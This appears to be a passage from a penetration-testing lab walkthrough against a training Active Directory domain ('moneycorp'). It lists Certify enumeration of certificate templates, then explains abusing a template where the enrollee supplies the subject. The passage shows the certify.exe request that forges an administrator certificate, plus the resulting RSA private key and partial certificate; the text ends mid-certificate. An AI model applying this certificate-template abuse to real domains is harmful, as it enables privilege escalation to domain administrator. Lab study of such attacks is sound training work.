AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-
3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
 Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-
3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL,
SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
 mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System,
Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Computers S-1-5-21-335606122-960912869-
3279953914-515
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID,
SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
 NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
 Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart
Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart
Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
AutoEnrollment Rights : mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID,
SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
AutoEnrollment Rights : mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS,
SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
 Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server
Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server
Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
AutoEnrollment Rights : mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Read-only Domain ControllersS-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-
3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
 WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Users
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 1
Application Policies : Certificate Request Agent
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-
3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
 mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-
3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : CA-Integration
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
 mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-
3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

Certify completed in 00:00:21.0017301

From the output, we can clearly see that the HTTPS certificates have the setting Enrollee supplies the
subject on it. There are other templates which has the same setting on it, but the difference is the
enrollment rights. The group dcorp\RDPUsers has enrollment rights on the certificate and any users in
this group can request a certificate for any user including the domain admins or enterprise admins. Since
our student user is part of the group RDPUsers we can abuse this feature.

Escalation to Domain Administrator

We will request a certificate for the Domain Administrator. Once we get the certificate, we will get the
TGT using that certificate.

Requesting a certificate
C:\Windows\system32>C:\AD\Tools\certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-
DC-CA /template:HTTPSCertificates /altname:administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
 \_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : dcorp\student163

[*] No subject name specified, using current context as subject.

[*] Template : HTTPSCertificates

[*] Subject : CN=student163, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : administrator

[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response : The certificate had been issued.

[*] Request ID : 28

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----

MIIEpAIBAAKCAQEAwGSIiUeUY9w2vszBhD4HLIsVJsEAxfSIrNamMRgciOERVvWa
lAkJsR6TSog0zs8gK5RcPimLAJWjbsNQ7dCokk9yvRyGNQQEok1SO238d90awdJc
hYPRY6qUAnhiTRcxthAc+NVq6MkK8BCRFwz4/mi9cBy9bTV2w4CiSr//gLG4fwuW
JebG4TOou0wD1STrGXJtfvNh2/8gkrMxVw3C/ki7TlGqoKOoe0tWbU3o/7JXvFRl
hhv1TALkM0cDSmiUVYKBhMhr151EIJB/moaZR+4AMRKM29HEimL3z2IH00ndTTBI
FNn0ru2bjHXU3ubO3wcO+0YOy8wO4SZvVK/GlQIDAQABAoIBAQCGzGmVtd9UcFCz
ModL/qHMJc62DnhaOlEguGxM7ZXgmcEqan7ZxdNSlBejGvfVBu6FWjefHkBUMoQF
8TdcyNuzV5MOyVOHBb+xb/dzyEYiPXqn3poQuiEVcciuSmalmOCtrXB/MBjt7R6K
wTDHM8Gpjv1b9ecLA3Co3hHXydpc8e/fJJH1UkVIpHqvxQU24pIQTqIxmdvNI4jO
okYbNqUqO0LqFnJJCIusBThuhmHJrWXg0Ln83LqXBvQ9AgkULIFwpitDjIpOW/+u
okBPrYsj/dxXJDnjzqhNhyX62PB2B+tOY5VyL/jkp/HBifZZ8mjPNbiDgCGlXYdA
/o8ZmLjpAoGBAPRxFJdcIZ/xCSiHd9WYDItGc3MOpwaVrzw7j0u6uiISj9/rJK2x
d0g38lyNlhx104olhW7V6LIZyQMQSDRrDMRdpAIHiPn6Jmkynv4wPkj9UQhjS4AM
e9Vwz4aRWEjIsHmy45QJSj4HSpf66B7oBi3DTyN68hAyYQUjtoyUVHjTAoGBAMl9
aOO6GkgG9WVF57Xh+d9308HCpJ1VrlAm3U+ylBj7gjEXoszVsLQ4xafXrI7G0o0m
dzekIbFRaoKSNP+FJ6oeHevk5vfGe1Ze/FDpZZb8rZSBNId5a2L2NdDg6qyX56r/
F+4HLruz0cPQYEBoOi81wF+XbY5I9kp0F2KcdCH3AoGAW0APcMV64+smARQ5HupI
3IErPetdXK7qILEXOCz3qRqGzQ9JvPF/1tzTw8szG2K82lhRbGO8HyhTCqq8WZ0Q
wgk23W8UqkTArAqyoa8+wR6Xbmsq1x1R6QbY4aJGc70/a97k5/Fj3q34Ia4PkuII
1HKRi2wtCvDTmQiQ7/+7XPMCgYA6QSwGS1Q15u0kLqXjjEY2OerbZm85ngAb5GCw
Hi17W5w0nWTQXCgOsytSb6TQUuOlM63cRHQJVES7I5J3HgRtxu9XuIKeuKAIRMYm
jpR0pvF4sjKByLUnk4/TqHOxGuo8IizFAQad9kt7lc9+T6Qi6iOIf7uJG8c5l377
X8ij2QKBgQC95QvtyjbDkkPZzCOnlQR9+E+FnlmHpUJiT/fLedw2Tjldiwpf5xlC
1UzFM0czeKmxC8K93dTblCqBN/vlzwVoHf6sgKozwHAQhPhkAF84popS2rhu0L0j
zUZ+gAPVmXUSxQnYhLl/DEn6drakvFuaiiQ5kF4ZHVxKqEJq7jfUdw==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGYjCCBUqgAwIBAgITFQAAABwB7xrct4Y5jAAAAAAAHDANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDA3MDUw
OTI3MDhaFw0yNjA3MDUwOTM3MDhaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50MTYzMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwGSIiUeUY9w2vszBhD4HLIsVJsEA
xfSIrNamMRgciOERVvWalAkJsR6TSog0zs8gK5RcPimLAJWjbsNQ7dCokk9yvRyG
NQQEok1SO238d90awdJchYPRY6qUAnhiTRcxthAc+NVq6MkK8BCRFwz4/mi9cBy9
bTV2w4CiSr//gLG4fwuWJebG4TOou0wD1STrGXJtfvNh2/8gkrMxVw3C/ki7TlGq
oKOoe0tWbU3o/7JXvFRlhhv1TALkM0cDSmiUVYKBhMhr151EIJB/moaZR+4AMRKM
29HEimL3z2IH00ndTTBIFNn0ru2bjHXU3ubO3wcO+0YOy8wO4SZvVK/GlQIDAQAB
o4IDDjCCAwowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jhhyaC
n65RgvL2fYE/hpePdoe0hBICAWQCAQYwKQYDVR0lBCIwIAYIKwYBBQUHAwIGCCsG
AQUFBwMEBgorBgEEAYI3CgMEMA4GA1UdDwEB/wQEAwIFoDA1BgkrBgEEAYI3FQoE
KDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZI
hvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsO
AwIHMAoGCCqGSIb3DQMHMB0GA1UdDgQWBBRcqlou8gJCax4Qw/CXu71Gjl4+szAo
BgNVHREEITAfoB0GCisGAQQBgjcUAgOgDwwNYWRtaW5pc3RyYXRvcjAfBgNVHSME
GDAWgBTR/o0Kp/q0Mp82/CC498ueaMVF7TCB2AYDVR0fBIHQMIHNMIHKoIHHoIHE
hoHBbGRhcDovLy9DTj1tb25leWNvcnAtTUNPUlAtREMtQ0EsQ049bWNvcnAtZGMs
Q049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENO
PUNvbmZpZ3VyYXRpb24sREM9bW9uZXljb3JwLERDPWxvY2FsP2NlcnRpZmljYXRl
UmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Q
b2ludDCBywYIKwYBBQUHAQEEgb4wgbswgbgGCCsGAQUFBzAChoGrbGRhcDovLy9D
Tj1tb25leWNvcnAtTUNPUlAtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUy
